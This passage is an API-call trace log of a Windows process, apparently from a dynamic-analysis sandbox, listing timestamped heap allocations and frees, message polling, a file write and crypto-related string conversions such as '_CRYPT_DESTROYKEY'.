wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0266.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0266.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0266.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0266.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0266.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0266.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0266.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0266.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0266.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0266.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0266.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x142d8) returned 0xe78608 [0266.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0266.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0266.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x142d8) returned 0x3d44008 [0266.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0266.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0266.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe78608 | out: hHeap=0x970000) returned 1 [0266.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0266.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0266.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0266.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0266.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0266.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x142d8) returned 0xe78608 [0266.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3d44008 | out: hHeap=0x970000) returned 1 [0266.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0266.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0266.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x142d8) returned 0x3d44008 [0266.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe78608 | out: hHeap=0x970000) returned 1 [0266.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0266.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0266.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0266.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0266.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0266.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0266.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0266.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0266.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0266.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0266.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0266.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0266.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0266.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977998 | out: hHeap=0x970000) returned 1 [0266.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0266.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0266.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0266.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ee0 | out: hHeap=0x970000) returned 1 [0266.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0266.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0266.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14d28 | out: hHeap=0x970000) returned 1 [0266.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0266.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0266.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0266.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0266.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0266.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0266.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0266.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0266.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0266.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0266.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0266.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0266.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe64328 | out: hHeap=0x970000) returned 1 [0266.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0266.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0266.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0266.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0266.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0266.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0266.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0266.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0266.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0266.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0266.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0266.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0266.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0266.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0266.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0266.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0266.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0266.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe50048 | out: hHeap=0x970000) returned 1 [0266.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0266.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0266.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0266.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0266.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0266.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe8c8e8 | out: hHeap=0x970000) returned 1 [0266.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0266.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0266.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0266.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0266.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0266.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0266.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0266.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0266.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0266.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0266.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0266.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f16018 | out: hHeap=0x970000) returned 1 [0266.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0266.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0266.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0266.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0266.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0266.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0266.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0266.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f2a2f8 | out: hHeap=0x970000) returned 1 [0266.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0266.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0266.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x142d8) returned 0x2f16018 [0266.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3d44008 | out: hHeap=0x970000) returned 1 [0266.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0266.881] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0266.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0266.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0266.881] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0266.881] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0266.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0266.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0266.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0266.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0266.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0266.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0266.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x142d8) returned 0x2f2a2f8 [0266.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0266.883] WriteFile (in: hFile=0x2a0, lpBuffer=0x2f2a2f8*, nNumberOfBytesToWrite=0x142d8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f2a2f8*, lpNumberOfBytesWritten=0x8cf5e4*=0x142d8, lpOverlapped=0x0) returned 1 [0266.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0266.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f2a2f8 | out: hHeap=0x970000) returned 1 [0266.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0266.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0266.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0266.885] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0266.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0266.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0266.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0266.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0266.886] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0266.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0266.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0266.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0266.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0266.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0266.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0266.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51808 [0266.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0266.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515e0 [0266.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51688 [0266.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0266.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51718 [0266.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0266.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0266.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51670 [0266.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0266.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0266.886] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0266.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0266.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0266.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0266.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e550d8 [0266.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0266.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0266.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0266.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0266.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51af0 [0266.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0266.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0266.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0266.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0266.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0266.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0266.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0266.887] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0266.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0266.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0266.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0266.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0266.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0266.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0266.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0266.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0266.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0266.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0266.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0266.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0266.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0266.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0266.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0266.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0266.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0266.888] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0266.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0266.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0266.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51ac0 [0266.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0266.888] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0266.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0266.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0266.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0266.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0266.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0266.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0266.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0266.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0266.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0266.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0266.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0266.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0266.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0266.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0266.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0266.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0266.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0266.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0266.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0266.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0266.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0266.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0266.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0266.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0266.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0266.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0266.889] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0266.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0266.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0266.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0266.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0266.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0266.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0266.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0266.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0266.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0266.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0266.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0266.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 